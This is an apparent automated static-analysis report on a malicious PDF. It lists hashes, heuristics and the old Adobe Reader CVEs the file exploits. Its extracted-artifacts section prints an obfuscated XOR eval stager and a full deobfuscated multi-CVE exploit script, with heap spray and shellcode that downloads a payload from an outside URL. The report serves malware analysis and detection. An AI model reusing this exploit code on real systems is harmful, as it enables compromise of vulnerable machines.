Malicious PDF — malware analysis report

Static analysis result for SHA-256 ebdb592dac2e339d…

MALICIOUS

PDF

Size: 4.9 KB
Created: 2010-08-07 11:41:17
Authoring application: Degixbiqe (via c6cc8Lihewaneqazawwo)
First seen: 2026-05-10
MD5: 82036ea58061ffa607689a7439ccbc3e
SHA-1: 6ac3ff402273dc72b436a9a297992e3340044b44
SHA-256: ebdb592dac2e339daf388e406d0bb8db8b5432adcdb8683847d2ce655f82b993
Risk Score: 390

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, identified by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_PAGE_WORD_XOR_EVAL_STAGER heuristic indicates that this JavaScript is obfuscated and designed to launch a secondary payload. The extracted artifact 'javascript_obj0011_000.js' is likely part of this stager. The document body is heavily obfuscated and unreadable, providing no direct clues about the lure. The primary attack vector appears to be the execution of this embedded, obfuscated script.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ahrudc.egh/4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: javascript_obj0011_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 11 at offset 0xE27
Size: 794 bytes
SHA-256: d8942c674fe1390e8f4965a16f823d7234a1b0c03346366a2910526dc47de0ff
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function pageload() {var dE='var pA = 138 O;vOaOOr sH =O this;Ovar vU=sH.getPageNumWords(this.pageNum);var gBI=O\'\';for(OOvar gZ=0;gZ<O vU; gOZ+O+OO){gBI=[gBOOI,sH.OOgetPagOeNOthWord(sH.pageNuOm,gZ,true)].join(OO\'\');;}vaOr bK=\'\';fOOor(var OOgZ=0;gZ < gBI.Olength; gZ+=2){kXOOCOO=OOgBI.sOOubOsOOtr(OOgZ,2O);bK=OO[bK,StringO.fromChOOarCOOode(paOrseOOInt(kXC,16)^pOOA)].Ojoin(\'\');}eOOvOOal(bK)O;bK=null;'.replace(/[O]/g, '');try {var cXG = new Function(dE);if (document.getElementsByTagName){var clk_li = top.navigation.document.getElementsByTagName('li');}else if (document.all){var clk_li = top.navigation.document.all.tags('li');}else{return;}for (var i=0;i<clk_li.length;i++){if(clk_li[i].parentNode.id != 'tabsRow') {clk_li[i].onclick = showList_li;}}} catch(e){    cXG();}}pageload();
Filename: legacy_pdfkit_stage_000.js
Kind: deobfuscated-js
Source: getPageWords-XOR Pidief stage normalized at offset 0x0
Size: 3694 bytes
SHA-256: e6dd782005d28a4c92d66aac2384adaf7f4b00d91e7aba16b59ea0a4bf1a6a8a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var p=new String();var j=false;var x=new String();var tY='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';this.qT=18168;this.qT+=94;this.xM='';var qD=this.info['t'].replace(/[\s]/g, '');hA=1067;hA--;jI=[];var lO = this.info;var kX = (lO.producer.substr(0,5) == 'debug');var pQ = new Array(); var eL = "%u";function bE(str){str = str.split(eL);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function uZ(str1, str2){return [str1, str2].join("");}function n(fY){var aV = xI();var mDG = kD();aV += ((aV.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + mDG;if(kX) app.alert("URL: " + aV);aV=xA(aV);var d=eL;var kXC=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";kXC+=aV;return bE(kXC);};function xI(){var cX = (lO.author + lO.title).replace(/[\s]/g, '');var fS = aN(cX, qD, tY);return fS;};function aN(cX, tY, qD){var fS="";for(var i=0; i < cX.length; i++){var pE = tY.indexOf(cX[i]);if(pE > -1 ){fS += qD[pE];}}return fS;};function xA(cX){var out = 
"";cX = cN(cX);g = Math.round(cX.length / 4);if (g != cX.length /4) cX+="00";for(var i=0; i < cX.length; i+=4){out+= eL + cX.substr(i+2, 2) + cX.substr(i, 2);}return out;};function cN(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function nS(yP, len){while (yP.length * 2 < len){yP = uZ(yP, yP);}return yP.substring(0, len / 2);};function lW(mR){var hU = 0x0c0c0c0c;        qZ = n("pdf");if (mR == 1){hU = 0x30303030;}var xU = 0x400000;var ln = qZ.length * 2;var gT = xU - (ln + 0x38);var yP = bE(eL+"9090"+eL+"9090"); yP = nS(yP, gT);var zO = (hU - 0x400000) / xU;for (var sR = 0; sR < zO; sR ++ ){pQ[sR] = uZ(yP, qZ);}};function kD(){try {return app.viewerVersion.toString();}catch(rC){    return 0;}}if(kX) app.alert("called exploit");var mDG = kD();if(kX)  app.alert("v: " + mDG);if (mDG > 8){if(kX) app.alert("util.printf");lW(1);var aP = "12999999999999999999";for (v=0; v < 276; v++) aP += "8";util.printf("%45000f", aP);}if (mDG < 8){if(kX) app.alert("Collab.collectEmailInfo");lW(0);var hQ = bE(eL+"0c0c"+eL+"0c0c");while (hQ.length < 44952) hQ += hQ;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : hQ});}if (mDG < 9.1){if (app.doc.Collab.getIcon){if(kX) app.alert("Collab.getIcon");lW(0);var uP = unescape("%09");while (uP.length < 0x4000) uP += uP;uP = "N." + uP;app.doc.Collab.getIcon(uP);}}if (mDG == 9.2){if(kX) app.alert("media.newPlayer");lW(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}tI=["mV","pK"];bM=["gX","dA"];var lI={oN:23891};